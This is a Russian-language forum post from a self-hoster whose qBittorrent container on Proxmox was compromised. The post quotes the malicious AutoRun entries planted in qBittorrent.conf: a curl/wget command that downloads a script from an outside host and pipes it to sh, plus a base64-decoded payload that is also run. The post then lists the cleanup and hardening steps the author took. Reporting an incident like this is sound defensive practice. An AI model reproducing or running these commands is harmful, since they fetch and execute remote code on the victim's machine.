Всем привет!
Внутри сервера Proxmox был LXC для qBittorrent, через который качал всякое. Внезапно обнаружил, что в файле: /root/.config/qBittorrent/qBittorrent.conf:
[AutoRun]
OnTorrentAdded\Enabled=true
OnTorrentAdded\Program=sh -c "(curl -s http://0x1x2x3.top || wget -qO - http://0x1x2x3.top) | sh"
enabled=true
program="sh -c \"echo <base64> | base64 -d | sh\""
Кто-то прописал в «выполнить при добавлении торрента» скрипт, который скачивает и запускает шелл с http://0x1x2x3.top. Хз может какой-то криптомайнер.
Проблема в том, что mount point был смонтирован к пулу с моими файлами. Могла ли эта гадость дальше пролезть и что можно сделать кроме проверки ClamAV?
ЧТО В ИТОГЕ:
- Поставил на входе на NGINX ограничение по GEOIP
- Убил инфицированный контейнер
- Проверил mount point через ClamAV, новых файлов не нашел
- Стал использовать CrowdSec
- Думаю над VPN для внутренних сервисов












